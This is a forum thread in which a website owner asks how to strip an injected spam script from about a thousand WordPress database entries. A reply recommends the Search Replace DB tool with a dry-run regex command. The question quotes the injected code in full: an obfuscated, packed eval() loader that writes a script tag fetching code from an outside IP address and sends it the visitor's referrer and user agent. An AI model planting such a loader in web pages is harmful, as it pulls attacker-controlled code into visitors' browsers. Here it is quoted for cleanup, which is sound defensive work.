Home Complex Query using special charecters
Reply: 1

Complex Query using special charecters

JoeDostie Published in 2018-01-12 22:37:19Z

Hopefully someone may have an easy solution here that I have not thought of, or a tool or something that can help, but I am at a total loss at this point.

I have a website I am working on that was recently hacked with a SPAM injection. Everything is secured now but I am tasked with cleaning up the remains of a script put on each page. The problem I am facing is that there are special characters used throughout the hack and escaping the special characters is proving to be very challenging.

I am also using a Query builder but even that is getting confused.

The code I am trying to remove is this:

<noindex><script id="wpinfo-pst1" type="text/javascript" rel="nofollow">eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("<a g=\'2\' c=\'d\' e=\'b/2\' 4=\'7://5.8.9.f/1/h.s.t?r="+3(0.p)+"\o="+3(j.i)+"\'><\/k"+"l>");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|zinsz|var|u0026u|referrer|bhsyf||js|php'.split('|'),0,{}))

As you can see once I start escaping characters I start to get lost. I was wondering if anyone has come across this and found an easier way.

I have successfully gone in an manually deleted the code directly in the database but unfortunately there is about 1006 locations and it just takes forever.

davidreedernst Reply to 2018-01-19 21:46:52Z

Unfortunately, modifying a Wordpress database with direct SQL queries can break PHP serialized strings and objects. So even if you come up with the perfect search term, don't do it that way.

Instead, you might try this awesome Search Replace DB tool. Make sure you follow all of their pleas about cautious use of the script, especially: do a backup first, use a very cryptic directory name, and remove the folder as soon as you're done. Also make sure you have php-mbstring running.

The web interface is really nice, but depending on the server setup, it can fail to work. There's also a command line interface, though. To use it, cd into the folder that has the tool. There's documentation for the CLI version in the README.md file. Here's the basic shape of a command to address your case, which you'll need to test and adjust to match your database setup:

php srdb.cli.php --host localhost.or.dbserver --name dbnamehere --user dbuserhere --pass 'dbpasswordhere' --search '/\<noindex\>\<script id\=\"wpinfo\-pst1\".*?<\\/noindex>/s' --replace '' --regex --dry-run

I love this tool's --dry-run feature, which is set in the code above. After you've done lots of dry-runs and are confident you're doing what you intend to do, remove that option from the command line (or uncheck the "dry-run" box if you're in the web interface) and the replace will actually happen. Then, remember, remove the tool so that no one else can use it.

You need to login account before you can post.

About| Privacy statement| Terms of Service| Advertising| Contact us| Help| Sitemap|
Processed in 0.31703 second(s) , Gzip On .

© 2016 Powered by mzan.com design MATCHINFO